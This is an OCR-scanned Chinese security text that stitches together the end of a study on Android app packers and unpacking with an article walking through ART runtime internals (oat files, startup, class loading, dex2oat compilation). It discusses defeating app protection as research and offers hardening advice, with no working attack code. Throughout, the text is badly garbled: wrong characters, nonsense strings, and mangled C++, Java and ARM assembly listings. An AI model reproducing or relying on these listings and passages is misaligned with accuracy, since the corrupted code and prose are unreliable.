另外 有 些 加 固 程 序 会 额外 插入 一 些 类 来 破坏 正常 的 反 编译 效果 ， 例 如 这 个 类 就 有 个 方法 是 能 
够 让 dex2jar 失 效 。 


Direct methods 
#0 : (in Lcom/example/simple/MyApplication; ) 

name : ‘<init>’ 
type : Ov" 
access : 0x10001 (PUBLIC CONSTRUCTOR) 
code 
codeOff : Oxffdef608 
registers af 
ins SE 
outs UT 
insns size : 4 16-bit code units 


|[ffdef608] com.example.simple.MyApplication.<init>:()V 
[0000: invoke-direct {v@}, Landroid/app/Application; .<init>:()V // method@003e 
[0003: return-void 


positions 
locals 


还 有 党 将 codeOff 改 成 了 负 的 值 ， 这 样 代码 就 会 被 映射 到 文件 内 存 范 围 之 外 。 我 们 的 方法 可 以 
直接 将 代码 获取 后 重新 写 回 到 正常 的 位 置 。 
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public class MyActivity extends Activity { 
static [ 
System.loadLibrary ("simple"); 


public MyActivity() { 
super (); 


private native int getInt() [ 


ecte id on eate ea 
A.d("Lcom/example/simple/MyActivity:;-»onCreate001 (Landroid/os/Bundle;)V"); 
this.onCreate001 (arg2); 

A.e("Lcom/example/simple/MyActivity:;-»onCreate001 (Landroid/os/Bundle;)V"); 





public boolean onCreateOptionsMenu (Menu menu) { 
this.getMenuInflater().inflate(2131165184, menu); 
return 1; 
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另外 还 有 沉 是 重 写 了 茶 些 方法 ， 将 代码 放 入 一 个 新 的 方法 中 ， 并 在 执行 前 去 解密 ， 执 行 后 再 
重新 抹 去 。 对 于 这 种 情况 ， 由 于 我 们 脱党 代码 插 桩 于 每 个 方法 调用 处 ， 因 此 我 们 只 需要 调整 
脱党 点 到 该 方法 执行 处 去 实施 脱 壳 就 能 恢复 出 代码 了 。 


public class MyActivity extends Activity { 
static [ 

System.loadLibrary ("simple"); 
) 


public MyActivity() { 
super (); 
} 


private native int getInt() { 
} 


protected void onCreate (Bundle arg2 
A.d("Lcom/example/simple/MyActivity;-»onCreate001 (Landroid/os/Bundle;)V"); 
this.onCreate001 (arg2); 

A.e("Lcom/example/simple/MyActivity:;-»onCreate001 (Landroid/os/Bundle;)V"); 






private void onCreate001(Bundle savedInstanceState) { 
super.onCreate (savedInstanceState); 
this.setContentView (2130903040); 
Log.i("TTT", "MyActivity.onCreate"); 
this.sendBroadcast (new Intent(((Context)this), MyBroadcastReceiver.class)); 


this.startService (new Intent(((Context)this), MyService.class)); 

this.getContentResolver().query(Uri.parse ("content://com.example.simple.MgContentProvider/"), 
null, null, null, null); 

Log.i("TTT", "getInt = " + this.getInt()):; 





} 


public boolean onCreateOptionsMenu(Menu menu) { 
this.getMenuInflater().inflate (2131165184, menu); 
return 1; 
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除 以 上 例子 外 ， 我 们 还 发 现 某 些 加 固 程 序 会 hook 进 程 空间 中 的 write 函数 ， 检 测 写 的 内 容 如 果 
是 特定 的 数据 (如 dex 文 件 头 ) ， 则 让 write 操作 失败 ， 或 者 获取 内 存 地 址 空间 在 映射 的 DEX 文 
件 区 域内 ， 也 会 让 Write 失 败 等 。 还 有 加 固 程序 会 将 原始 的 DEX 文 件 分 离 出 多 个 DEX， 以 及 修 
改 特定 的 数据 项 如 debug_info_off 为 错误 值 ， 运行 时 再 动态 改 回 正确 值 。 还 有 完 会 在 字 节 码 基 
础 上 对 原始 的 程序 做 代码 混淆 。 


(i : 以 上 例子 都 并 非 最 新 版 本 ， 不 保证 特定 的 加 固 程 序 现 有 产品 与 上 述 例 子 依然 一 致 ) 
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首先 我 们 的 方法 依然 有 局 限 性 ， 一 来 在 研究 对 象 里 说 明了 我 们 只 针对 DEX 文 件 加 密 保 护 ， 并 
不 做 反 混淆 的 工作 。 其 次 我 们 的 方法 依然 是 基于 动态 分 析 ， 将 面临 动态 分 析 的 局 限 性 ， 如 一 
段 加 密 代 码 是 运行 到 才 解 密 ， 但 该 方法 无 法 被 触发 执行 ， 我 们 的 方法 也 无 法 解密 这 个 方法 的 
代码 。 最 后 用 该 方法 虽然 难以 被 加 固 程 序 检测 ， 但 用 该 方法 制作 的 工具 在 实现 上 势必 会 有 茶 
些 特征 ， 这 些 特征 可 能 会 被 加 固 程 序 加 以 利用 和 对 抗 。 


最 后 是 我 想 和 大 家 一 起 探讨 的 关于 更 好 的 Android 平 人 台 应 用 程序 加 固 的 想法 。 事 实 上 Android 平 
台 的 加 固 破解 还 是 相对 容易 的 ， 然 而 并 不 是 没有 更 难 更 安全 的 加 固 方 案 ， 而 是 在 手机 平台 上 
商用 的 加 固 方案 需要 考虑 到 性 能 损耗 和 兼容 性 的 问题 ， 这 是 无 法 避免 的 。 同 时 综合 这 几 个 方 
面 ， 我 觉得 加 固 保 护 的 趋势 和 做 法 发 展 主 要 集中 在 以 下 的 几 个 点 。 


一 个 是 我 觉得 Android 混 淆 和 加 党 其 实 可 以 结合 使 用 。 从 攻击 者 的 角度 来 看 ， 我 认为 强力 的 混 
淆 可 能 要 比 加 这 在 保护 代码 逻辑 方面 更 加 有 效 。 但 是 好 的 混淆 方案 事实 上 非常 难以 设计 。 目 
前 来 看 国内 的 加 固 几 乎 不 会 对 原始 的 代码 做 大 的 变换 和 混淆 ， 可 能 是 怕 修 改 的 代码 在 兼容 性 
上 会 有 问题 。 我 认为 这 是 一 个 发 展 点 。 我 发 现 国 外 比较 优秀 的 工具 会 在 深度 混淆 这 个 点 上 做 
文章 ， 比 如 dexprotector， 他 既 有 加 壳 ， 也 有 混淆 ， 即 使 脱 壳 成 功 ， 还 是 需要 去 面 对 难 以 理解 
的 混淆 后 代码 。 


另外 我 觉得 部 分 加 固 的 效果 在 安全 性 上 可 能 要 强 过 整体 加 固 。 就 像 之 前 的 一 个 例子 ， 一 个 方 
法 只 有 在 运行 时 才 解 密 自己 ， 一 旦 脱离 运行 则 重新 加 密 或 抹 掉 。 这 个 等 于 是 利用 了 动态 执行 
履 盖 率 低 的 缺陷 来 进一步 保护 自己 。 


第 三 个 就 是 为 了 更 好 的 加 固 效 果 ， 加 固 过 程 应 该 尽 可 能 从 现在 的 开发 后 加 固 变 成 开发 中 的 加 
固 。 现 在 有 一 些 加 固 SDK 就 是 这 方面 比较 好 的 尝试 。 直 接 在 开发 的 过 程 中 敏感 的 操作 使 用 一 
个 安全 库 的 接口 。 这 个 无 论 是 在 性 能 上 还 是 效果 都 可 以 对 现在 的 整体 一 刀 切 式 的 加 固 做 个 质 
的 提高 。 熟 悉 业 务 的 开发 人 员 会 很 清楚 他 们 需要 保护 的 代码 是 哪 一 部 分 ， 因 为 一 个 程序 事实 
上 申 正 需要 被 保护 的 逻辑 可 能 只 是 很 小 一 部 分 ， 加 固 范围 的 缩小 可 以 大 大 提高 性 能 ， 同 时 单 
独 的 安全 库 文件 可 以 有 针对 性 的 保护 措施 ， 效 果 会 非常 好 ， 另 外 比 起 整个 APP 加 固 也 更 容易 
做 的 兼容 性 测试 。 

加 国 另 一 个 思路 是 尽 可 能 用 Native 的 代码 ， 特 别 是 关键 的 程序 逻辑 ，Native 代 码 逆向 本 身 就 比 
Java 困 难 ， 加 了 混淆 或 者 党 后 就 更 难 了 ， 同 时 Native 代 码 事 实 上 还 能 在 性 能 上 有 所 提高 ， 是 
一 举 两 得 的 方案 。 由 此 又 可 以 延伸 出 如 何 对 Android 应 用 程序 中 native 代 码 做 深度 保护 的 问 


题 ， 如 果 敏 感 操 作用 深度 混 消 保 护 的 native 代 码 做 保护 ， 则 攻击 成 本 势必 将 极 大 提升 。 


最 后 我 觉得 加 固 保 护 的 一 个 趋势 是 尽量 少 的 去 利用 小 trick 来 做 防护 ， 比 如 那些 利用 静态 分 析 工 
具 的 BUG 或 者 系统 解析 APK 的 BUG 来 做 加 固 其 实意 义 不 是 很 大 ， 加 固 保 护 更 应 该 从 整个 计算 
机 系统 的 体系 结构 上 来 考虑 和 强化 ， 而 不 应 该 集中 于 一 些小 的 技巧 。 


原文 by zyq8709 


ART 是 Android 平 台 上 的 新 一 代 运 行 时 ,用 来 代替 dalvik。 它 主要 采用 了 AOT 的 方法 ， 在 apk 安 装 
的 时 候 将 dalvikbytecode 一 次 性 编译 成 arm 本 地 指令 (但 是 这 种 AOT 与 c 语 言 等 还 是 有 本 质 不 同 
的 ， 还 是 需要 虚拟 机 的 环境 支持 ) ， 这 样 在 运行 的 时 候 就 无 需 进 行 任 何 解释 或 编译 便 可 直接 
执行 ， 节 省 了 运行 时 间 ， 提 高 了 效率 ， 但 是 在 一 定 程度 上 使 得 安装 的 时 间 变 长 ， 空 间 占 用 变 
Ao 


从 Android 的 源码 上 看 ，ART 相 关 的 内 容 主要 有 compiler 和 与 之 相关 的 程序 dex2oat、 
runtime、Java 调 试 支持 和 对 oat 文 件 进行 解析 的 工具 oatdump。 


下 面 这 张 图 是 ART 的 源码 目录 结构 : 


Android. mk 

build/ 

compiler/ 

dalvikvn/ 

dex2oat/ 

jdwpspy/ 

MODULE LICENSE APACHE2 
NOTICE 

oatdump/ 

runtine/ 


test/ 
tools/ drops.wooyun.org 


中 间 有 几 个 目录 比较 关键 ， 


首先 是 dex2oat， 负 责 将 dex 文 件 给 转换 为 oat 文 件 ， 具 体 的 翻译 工作 需要 由 compiler 来 完成 ， 
最 后 编译 为 dex2oat : 


其 次 是 runtime 目 录 ， 内 容 比 较 多 ， 主 要 就 是 运行 时 ， 编 译 为 libart.so 用 来 蔡 换 libdvm.so， 
dalvik 是 一 个 外 党 ， 其 中 还 是 在 调用 ART runtime : 


oatdump 也 是 一 个 比较 重要 的 工具 ， 编 译 为 oatdump 程 序 ， 主 要 用 来 对 oat 文 件 进行 分 析 并 格 
式 化 显示 出 文件 的 组 成 结构 ; 


jdwpspy 是 java 的 调试 支持 部 分 ， 即 JDWP 服 务 端的 实现 。 


0x01 oat x 4# 


oat 文 件 的 格式 ， 可 以 从 dex20at 和 oatdump 两 个 目录 入 手 。 简 单 的 说 ，oat 文 件 是 府 套 在 一 个 
elf 文 件 的 格式 中 的 。 在 elf 文 件 的 动态 符号 表 中 有 三 个 重要 的 符号 : oatdata、oatexec、 
oatlastword， 分 别 表示 oat 的 数据 区 ，oat 文 件 中 的 native code 和 结束 位 置 。 这 些 关系 结构 在 
图 中 说 明 的 很 清楚 ， 简 单 理解 就 是 在 oatdata 中 ， 保 存 有 原来 的 dex 文 件 内 容 ， 在 头 部 还 保留 
了 寻 址 到 dex 文 件 内 容 的 偏 移 地 址 和 指向 对 应 的 oat class 偏 移 ，oat class 中 还 保存 了 对 应 的 
native code 的 偏 移 地 址 ， 这 样 也 就 间接 的 完成 了 dexbytecode 和 native code 的 对 应 关系 。 


具体 的 一 些 代码 可 以 参考 /art/dex2oat/dex2oat.cc 中 

的 static int dex2oat(intargc, char** argv) 函数 和 /art/oatdump/oatdump.cc 

的 static intoatdump(intargc, char** argv) 的 函数 ， 可 以 很 快 Peak 85 39 fitoat X PF 85 46 fe AR 
Yt » &lart/compiler/elf writer quick.cc 中 的 Write 函数 很 值得 参考 。 


0x02 运行 时 的 局 


ART 运 行 于 时 的 启 动 过 程 很 早 , 是 由 zygote 所 局 动 的 , 与 dalvik 的 局 动 过 程 完 全 一 样 ， 保 证 了 由 
dalvik 到 ART 的 无 缝 衔接。 


整个 启动 过 程 是 从 app_processs (/frameworks/base/cmds/app process/app main.cpp) 开 
始 的 ， 创 建 了 一 个 对 象 AppRuntime runtime > NL ， 整 个 系统 运行 时 只 有 一 个 。 
随 着 zygote 的 fork 过 程 ， 只 是 在 不 断 地 复制 指向 这 个 对 象 的 指针 个 每 个 子 进程 。 然 后 就 开始 执 
行 runtime.start 方 法 。 这 个 方法 里 先 调用 startVm 局 动 庶 拟 机 。 是 由 JNIL_CreateJavaVM 方 法 具 
体 执行 的 的 ， 即 /art/runtime/jni_internal.cc 的 

extern "C" jintJNI CreateJavaVM(JavaVM** p vm, JNIEnv** p env, void* vm args) ° 然后 调用 
startReg 注 册 一 些 native 的 method。 在 最 后 比较 重要 的 是 查找 到 要 执行 的 java 代 码 的 main 方 
法 ， 然 后 执行 进入 托管 代码 的 世界 ， 这 也 是 我 们 感 兴趣 的 地 方 。 


875 char* slashClassName = toSlashClassName (className) ; 
876 jclass startClass = env->FindClass(slashClassName) ; 
877 if (startClass == NULL) | 
878 ALOGE("IavaVM unable to locate class ‘%s’\n", slashClassName) ; 
879 /* keep going */ 
880 ] else { 
881 jnethodID startMeth = env—>GetStaticMethodID(startClass, “main”, 
882 * ([L3ava/lang/String:)V"): 
883 if (startMeth == NULL) { 
884 ALOGE("JavaVM unable to find main() in '*s'Wn', className); 
885 /* keep going */ 
886 } else | 
887 env-»CallStaticVoidlethod(startClass, startMeth, stràr Hay . 
RRR drops. wooyini.org 
如 图 ， 最 后 调用 的 是 CallStaticVoidMethod， 去 看 看 它 的 实现 : 
1922 static void CallStaticyoidethod(JNIEnv* env, jclass, jmethodID mid, ...) { 
1923 va list ap; 
1924 va start(ap, nid): 
1925 CHECK, NON NULL. ARGUNENT (CallStaticVoidNethod, mid); 
1926 ScopedObjectAccess soa(env); 
1927 InvokeWithVarArgs(soa, NULL, mid, ap); 
1928 va end(ap) ; 
1928  ] drops.wooyun.org 


再 去 寻找 InvokeWithVarArgs : 


Android ART 运行 时 (上 ) 


| 150 static JValue InvokeVithVarArgs(const ScopedObjecthccess& soa, jobject obj, 
151 jmethodID mid, va_list args) 
152 SHARED LOCKS REQUIRED (Locks: : mutator_lock_) [ 
153  ArtMethod* method = soa. DecodeMethod(mid) ; 
154  Object* receiver = method->IsStatic() ? NULL : soa. Decode<Object*> (obj); 
155 MethodHelper mh(method) ; 
156 JValue result; 
157 ArgArray arg array(mh.GetShorty(), mh.GetShortyLength()) : 
158 — arg array.Buildárgàrray(soa, receiver, args): 
159 InvokeWithdrgdrray(soa, method, &arg array, &result, mh.GetShorty() [0]) : 
160 return result; 
161 ] drops.wooyun.org 


3E Z| InvokeWithArgArray : 


| 140 void InvokeWithàrgArray(const ScopedObjectaccessk soa, ArtMethod* method, 
141 ArgArray* arg array, J¥alue* result, char result type) 
142 SHARED LOCKS REQUIRED (Locks::mutator lock ) | 
143  uint32 ts args = arg_array->GetArray(); 
144 iff (UNLIKELY (soa. Env()->check_jni)) { 
145 CheckMethodArguments (method, args); 
146 1 
147  method-?Invoke(soa.Self(), args, arg array-?GetNumBytes(), result, result type): 
148 } 
149 drops.wooyun.org 


可 以 看 到 一 个 很 关键 的 class : 


namespace airror [ 
class StaticStorageBase; 


typedef void (SnutrypPointFromInterpreter)(TIhread* self, MethodHelper& ah, 
const DexFile::Codeltem* code item, ShadowFrame* shadow frsme, JValue* result); 


// C** mirror of jsva.lang.reflect. Method and java. lang. ref lect. Constructor 
class MANAGED ArtMethod | public Object [ 

public: 

Class* GetDeclaringClasz() const; 


void SetDeclaringClass (Clase *new declaring class) SHARED LOCKS REQUIRED (Locks: - ops. AVGéyun.org 


即 ArtMethod， 它 的 一 个 成 员 方 法 就 是 负责 调用 oat 文 件 中 的 native code 的 : 


Z6u I 

270 #ifdef ART_USE_PORTABLE_COMPILER 

271 (*art_portable_invoke_stub) (this, args. args size, self, result, result type): 

272 felse 

213 (*art quick invoke stub)(this, args, args size, self, result, result : 

D kanait dip wooyun.org 


最 后 这 就 是 最 终 的 入 口 : 
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Android ART 运行 时 (上 ) 


256 ENTRY art quick, invoke, stub 


257 
258 
259 
260 
261 
262 
263 
264 
265 
266 
267 
268 
269 
270 
271 
272 


273 


push — [rO, r4, 
.save {rO, r4, 
.pad #24 

„cfi adjust cfa. 
. cfi rel offset 
.CÍi rel offset 
. cf1, rel, offset 
.Cíi rel offset 
. cf1, rel offset 
.cfi rel offset 
ROV rll, sp 
.Ccfi def cfa req 
nov r9, r3 


nov r4, WSUSPEND CHECK INTERVAL 


add r5, r2, 8 


and r5, #0xFF 
sub sp, r5 
add r0, sp, # 
bl nencpy 


ldr rô, [r11] 
ldr rl, (sp. 
ldr t2, (sp. 
ldr r3, (sp. 
nov ip, #0 
str ip, [sp] 
ldr ip, [r0, 
blx ip 

aov tp, ril 
ldr ip, (sp, 
strd r0, [ip] 
pop {r0, r4, 
.cfi adjust cfta 
bx lr 


rS, r9, ril, 1r} 
rb, r9, ril, 1r] 


offset 24 
r0, 0 

t4, 4 

r5, 8 

r9, 12 
rll, 16 
lr, 20 


ister ril 
16 
FFFFFO 

4 

#4) 


#8) 
#12) 


#METHOD_CODE_OFFSET) 


#24) 


r5, r9, ril, 1r} 
offset -24 


END art_quick_anvoke_stub 


@ spill regs 


restore method* 


@ set ip to 0 


save the stack pointer 


copy arg value for r1 
@ copy arg value for :2 
@ copy arg value for :3 


move managed thread pointer into r9 

reset r4 to suspend check interval 

create space for method pointer in frame 

align frame size to 16 bytes 

reserve stack space for argument array 

pass stack pointer + method ptr as dest for nemcpy 
mencpy (dest, sre, bytes) 


@ store NULL for method* at bottom of frane 


@ get pointer to the code 


@ call the method 


@ restore the stack pointer 

@ load the result pointer 

@ store rÜ0/rl into result pointer 
@ restore spill regs 


drops.wooyun.org 


283 行 的 blxip 指 令 就 是 最 终 进 入 native code 的 位 置 。 可 以 大 致 得 到 结论 ， 通 过 查找 相关 的 oat 

文件 ， 得 到 所 需要 的 类 和 方法 ， 并 将 其 对 应 的 native code 的 位 置 放 入 ArtMethod 结 构 ， 最 后 通 
过 Invoke 成 员 完 成 调用 。 下 一 步 的 工作 需要 着 重 关注 的 便 是 native code 代 码 调用 其 他 的 java 方 
法 时 如 何 去 通 过 运行 时 定位 和 跳 转 的 。 


注意 注释 中 描述 了 ART 下 的 ABl ;与 标准 的 ARM 调 用 约定 相似 ， 但 是 RO 存放 的 是 调用 者 的 方 
法 的 ArtMethod 对 象 地 址 ，R0-R3 包 含 的 才 是 和 参数， 包括 this。 多 余 的 存放 在 栈 中 ， 从 SP+16 


的 位 置 开 始 。 返 回 值 同样 通过 RO/R1 传 递 。R9 指 向 运行 时 分 配 的 当前 的 线程 对 象 指 针 。 


0x03 类 加 载 


类 加 载 的 任务 主要 由 ClassLinker 类 来 负责 ， 先 看 一 下 这 个 过 程 的 顺序 图 : 
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Android ART 运行 时 (上) 


CLassLinker 


Class 





DefineClass 


LoadClass 


SetSFields 


SetStaticField 


LoadField 


SetVirtual Methods 


LoadMethod 


SetVirtualMethod 


static LinkCode 





drops.wooytrrorg 
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叙述 。 


从 FindClass 开 始 : 


361 


mirror::Class* ClassLinker::FindClass(constchar* descriptor, mirror::ClassLoader* clas 


s loader) { 


mirror::Class* klass - LookupClass(descriptor, class loader); 
if (klass !- NULL) ( 
returnEnsureResolved(self, klass); 


} 
if (descriptor[0] == '[') { 
returnCreateArrayClass(descriptor, class loader); 


) elseif (class loader == NULL) { 


DexFile::ClassPathEntry pair = DexFile::FindInClassPath(descriptor, boot class path ); 


if (pair.second != NULL) { 
returnDefineClass(descriptor, NULL, *pair.first, *pair.second); 


i 略 次 要 的 代码 ， 首 先 利 用 LookupClass 查 找 所 e pnis ， 对 于 此 场景 所 以 不 符合 
条 件 。 然 后 判断 是 否 是 数组 类 型 的 类 ， 也 跳 过 此 分 支 ， 进 入 到 我 们 最 感 兴 趣 的 DefineClass 


o 


mirror::Class* ClassLinker::DefineClass(constchar* descriptor, 
mirror::ClassLoader* class loader, 

constDexFile&dex file, 
constDexFile::ClassDef&dex class def) ( 
SirtRef<mirror::Class>klass(self, NULL); 
if (UNLIKELY(!init done )) { 
// finish up init of hand crafted class roots 
if (strcmp(descriptor, "Ljava/lang/Object;") == 0) { 
klass.reset(GetClassRoot(kJavaLangObject)); 

} elseif (strcmp(descriptor, "Ljava/lang/Class;") == 0) ( 
klass.reset(GetClassRoot(kJavaLangClass)); 

) elseif (strcmp(descriptor, "Ljava/lang/String;") -- 0) ( 
klass.reset(GetClassRoot(kJavaLangString)); 

) elseif (strcmp(descriptor, "Ljava/lang/DexCache;") -- 0) ( 
klass.reset(GetClassRoot(kJavaLangDexCache)); 

} elseif (strcmp(descriptor, "Ljava/lang/reflect/ArtField;") == 0) ( 
klass.reset(GetClassRoot(kJavaLangReflectArtField)); 

) elseif (strcmp(descriptor, "Ljava/lang/reflect/ArtMethod;") == 0) ( 
klass.reset(GetClassRoot(kJavaLangReflectArtMethod)); 

) else { 
klass.reset(AllocClass(self, SizeOfClass(dex file, dex class def))); 


} 
) else { 
klass.reset(AllocClass(self, SizeOfClass(dex_file, dex_class_def))); 


klass->SetDexCache(FindDexCache(dex_file) ); 
LoadClass(dex file, dex class def, klass, class loader); 


returnklass.get(); 


} 


拣 重 要 的 部 分 看 ， 这 个 方法 基本 上 完成 了 两 个 个 功能 ， 即 从 dex 文 件 加载 类 和 加 载 过 


一 个 表 中 ， 供 LookupClass 查 询 。 


我 们 关注 第 一 个 功能 ， 首 先是 进行 一 些 内 置 类 的 判断 ， 对 于 自 定义 的 类 则 是 手动 分 
间 、， 然 后 查找 相关 的 dex 文 件 ， 最 后 进行 加 载 。 


接着 看 LoadClass 方 法 : 


的 类 插入 


voidClassLinker::LoadClass(constDexFile&dex file, 
constDexFile::ClassDef&dex class def, 
SirtRef«mirror::Class»&klass, 

mirror::ClassLoader* class loader) ( 


// Load fields fields. 


const byte* class data - dex file.GetClassData(dex class def); 
if (class data == NULL) { 


return; // no fields or methods for example a marker interface 


ClassDataItemIteratorit(dex file, class data); 

Thread* self - Thread::Current(); 
if (it.NumStaticFields() != 0) { 

mirror: :ObjectArray<mirror: :ArtField>* statics = AllocArtFieldArray(self, it.NumSt 

aticFields()); 
if (UNLIKELY(statics == NULL)) { 
CHECK(self->IsExceptionPending());  // OOME. 
return; 


} 
klass->SetSFields(statics) ; 


} 
If (it.NumInstanceFields() != 0) { 
mirror: :ObjectArray<mirror: :ArtField>* fields = 
AllocArtFieldArray(self, it.NumInstanceFields()); 
if (UNLIKELY(fields == NULL)) { 
CHECK(self->IsExceptionPending());  // OOME. 
return; 


} 

klass->SetIFields(fields); 

} 
for (size ti = 0; it.HasNextStaticField(); i++, it.Next()) { 
SirtRef<mirror::ArtField>sfield(self, AllocArtField(self)); 
if (UNLIKELY(sfield.get() == NULL)) { 
CHECK(self->IsExceptionPending());  // OOME. 
return; 


} 

klass->SetStaticField(i, sfield.get()); 
LoadField(dex_file, it, klass, sfield); 

} 
for (size ti = 0; it.HasNextInstanceField(); i++, it.Next()) { 
SirtRef<mirror: :ArtField>ifield(self, AllocArtField(self)); 
if (UNLIKELY(ifield.get() == NULL)) { 
CHECK(self->IsExceptionPending());  // OOME. 
return; 


klass->SetInstanceField(i, ifield.get()); 
LoadField(dex_file, it, klass, ifield); 
} 


UniquePtr«constOatFile::OatClass»oat class; 
if (Runtime: :Current()->IsStarted() && !Runtime: :Current()->UseCompileTimeClassPatnh() ) 


{ 
oat class.reset(GetOatClass(dex file, klass->GetDexClassDefIndex())); 


} 


// Load methods. 

if (it.NumDirectMethods() != 0) { 

// TODO: append direct methods to class object 
mirror: :ObjectArray<mirror::ArtMethod>* directs = 

AllocArtMethodArray(self, it.NumDirectMethods()); 

if (UNLIKELY(directs == NULL)) { 

CHECK(self->IsExceptionPending());  // OOME. 

return; 


klass->SetDirectMethods(directs); 


} 
if (it.NumVirtualMethods() != 0) { 
// TODO: append direct methods to class object 
mirror: :ObjectArray<mirror: :ArtMethod>* virtuals = 
AllocArtMethodArray(self, it.NumVirtualMethods()); 
if (UNLIKELY(virtuals == NULL)) { 


CHECK(self->IsExceptionPending());  // OOME. 
return; 
} 
klass->SetVirtualMethods(virtuals) ; 
} 
size_tclass_def_method_index = 0; 
for (size ti = 0; it.HasNextDirectMethod(); i++, it.Next()) { 
SirtRef<mirror: :ArtMethod>method(self, LoadMethod(self, dex file, it, klass)); 
if (UNLIKELY(method.get() == NULL)) { 
CHECK(self->IsExceptionPending());  // OOME. 
return; 
} 
klass->SetDirectMethod(i, method.get()); 
if (oat class.get() != NULL) { 
LinkCode(method, oat_class.get(), class_def_method_index) ; 
} 
method-»-SetMethodIndex(class def method index); 
class def method index--; 
} 
for (size ti = 0; it.HasNextVirtualMethod(); i++, it.Next()) { 
SirtRef<mirror::ArtMethod>method(self, LoadMethod(self, dex_file, it, klass)); 
if (UNLIKELY(method.get() == NULL)) { 
CHECK(self->IsExceptionPending()); // OOME. 
return; 
} 
klass->SetVirtualMethod(i, method.get()); 
DCHECK_EQ(class_def_method_index, it.NumDirectMethods() + i); 
if (oat_class.get() != NULL) { 
LinkCode(method, oat_class.get(), class def method index); 





class def method index--; 


为 了 再 清 这 个 方法 ， 我 们 先 得 看 看 Class 类 利用 了 什么 重要 的 成 员 


ObjectArray<ArtMethod>* direct methods ; 

// instance fields 

// specifies the number of reference fields. 

ObjectArray«ArtField»* ifields ; 

// For every interface a concrete class implements, we create an array of the concrete 
vtable 

// methods for the methods in the interface. 

IfTable* iftable ; 

// Static fields 

ObjectArray<ArtField>* sfields_; 

// The superclass, or NULL if this is java.lang.Object, an interface or primitive type. 


// Virtual methods defined in this class; invoked through vtable. 
ObjectArray<ArtMethod>* virtual methods ; 

// Virtual method table (vtable), for use by "invoke-virtual". The vtable from the su 
perclass is 

// copied in, and virtual methods from our class either replace those from the super o 
r are 

// appended. For abstract classes, methods may be created in the vtable that aren't in 
// virtual methods for miranda methods. 

ObjectArray<ArtMethod>* vtable ; 

// Total size of the Class instance; used when allocating storage on gc heap. 

// See also object size . 

size tclass size ; 


s m Era 


这 样 就 比较 清晰 了 。LoadClass 首 先 读 取 dex 文 件 中 的 classdata， 然 后 初始 化 一 个 迭代 器 来 对 
classdata 中 的 数据 进行 遍历 。 接 下 来 分 部 分 进行 : 





分 配 一 个 对 象 ObjectArray 来 表示 静态 成 员 ， 并 利用 静态 成 员 的 数量 初始 化 ， 并 将 这 个 对 象 的 
地 址 赋值 给 Class 的 sfields 成 员 。 


同样 的 完成 Class 的 ifields 成 员 的 初始 化 ， 用 来 表示 私有 数据 成 员 


接 下 来 ， 遍 历 静 态 成 员 ， 对 于 每 个 成 员 分 配 一 个 Object 对 象 ， 然 后 将 地 址 放 入 之 前 分 配 的 
ObjectArray 数 组 中 ， 并 将 dex 文 件 中 的 相关 信息 加 载 到 Object 对 象 中 ， 从 而 完成 了 静态 成 员 信 
息 的 读 取 。 


同 理 ， 完 成 了 私有 成 员 信息 的 读 取 。 


像 对 于 数据 成 员 一 样 ， 分 配 一 个 ObjectArray 用 于 表示 directmethod， 并 用 于 初始 化 
directmethods X 5i ° 
I] 3€ > 3943610 T virtualmethods X hi ° 


遍历 directmethod 成 员 ， 对 于 每 一 个 directmethod 生 成 一 个 ArtMethod 对 象 ， 并 在 构造 函数 中 
通过 LoadMethod 完 成 dex 文 件 中 相应 信息 的 读 取 。 再 将 ArtMethod 对 象 放 入 之 前 的 
ObjectArray 中 ， 还 需要 利用 LinkCode 将 实际 的 方法 代码 起 始 地 址 用 来 初始 化 ArtMethod 的 
entrypoint_from_compiled_code 成 员 ， 最 后 更 新 每 个 ArtMethod 的 methodindex 成 员 用 于 方法 
索引 查找 。 


同样 的 过 程 完成 了 对 于 VirtualMethod 的 处 理 
最 终 就 完成 了 类 的 加 载 。 
下 面 需 要 再 关注 一 下 一 个 类 实例 化 的 过 程 。 


类 的 实例 化 是 通过 TLS (线程 局 部 存储 ) 中 的 一 个 函数 表 中 的 pAllocObject 来 进行 的 。 

pAllocObject 这 个 函数 指针 被 指向 了 art_quick_alloc_object 亟 数 。 这 个 函数 是 与 硬件 相关 的 ， 
5 Fs LE XA Fl F artAllocObjectFromCode 4 4 > LHM f AllecObjectFromCode 4% > E Z 
成 了 一 系列 检查 判断 后 调用 了 Class::AllocObject， 这 个 方法 很 简单 ， 就 是 一 句 话 : 
returnRuntime: :Current()->GetHeap()->AllocObject(self, this, this->object_size_) 

其 实 是 在 堆 上 根据 之 前 LoadClass 时 指定 的 类 对 象 的 大 小 分 配 了 一 块 内 存 ， 按 照 一 个 Object 对 
象 指 针 返 回 。 


可 以 以 图 形 来 展示 一 下 : 


Android ART 运行 时 (上) 


art quick alloc object 


artAllocObjectFromCode 


AllocOb jectFromCode 


AllocOb jectFromCode 


Class: :AllocObject 


Runtime: :Current ()~>Getlleap 
>AllocObject (self, this, this- 
^object size ) 
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看 一 下 最 后 调用 的 这 个 函数 : 


mirror::Object* Heap::AllocObject(Thread* self, mirror::Class* c, size_tbyte_count) { 





if (LIKELY(obj != NULL)) { 
obj->SetClass(c); 
returnobj; 

} else { 


在 这 个 函数 中 分 配 了 内 存 空间 之 后 ， 还 调用 了 SetClass 这 个 关键 的 函数 ， 把 Object 对 象 中 的 
klass 成 员 利 用 LoadClass 的 结果 初始 化 了 。 


Android ART 运行 时 (上 ) 


这 样 的 话 一 个 完整 的 类 的 实例 化 的 内 存 结构 就 如 图 所 示 了 : 


his b 3e 


EUM ; 
Lm] ifiebds= [mee] 3 | tid 
direct setheds- [Guess | | | | | 
virtual_qethods_ 





| | — I | —] 


Lus [Lem | 
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0x04 编译 过 程 


关于 ART 的 编译 过 程 ， 主 要 是 由 dex20at 程 序 启动 的 ， 所 以 可 以 从 dex20at 入 手 ， 先 画 出 整个 
过 程 的 顺序 图 。 
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Android ART 运行 时 (上) 


Dex20at CompilerDriver Compi l edMe thod Compi lerLI.VM | art 






CreateDatF ile 


Compi LeA11 







Compile 


Compi leClass 


Compi leMet hod 






Compi leQneWethod 






ArtCompi leWethoad 







Compi leDexMethod 
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上 图 是 第 一 阶段 的 流程 ， 主 要 是 由 dex2oat 调 用 编译 器 的 过 程 。 
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Android ART 运行 时 (上) 


ArmMir2Lir 





art MIRGraph Mir2Lir 


Compi leMethod 


InlineMethod 


CodeLayout 


SSATransformat ion 


PropagateConstants 





Materialize 





MethodMTR2LTR 


MethodBlockCodeGen 


Compi loDalvikTnstruction 


AssembleLTR 


Assemblelnstructions 
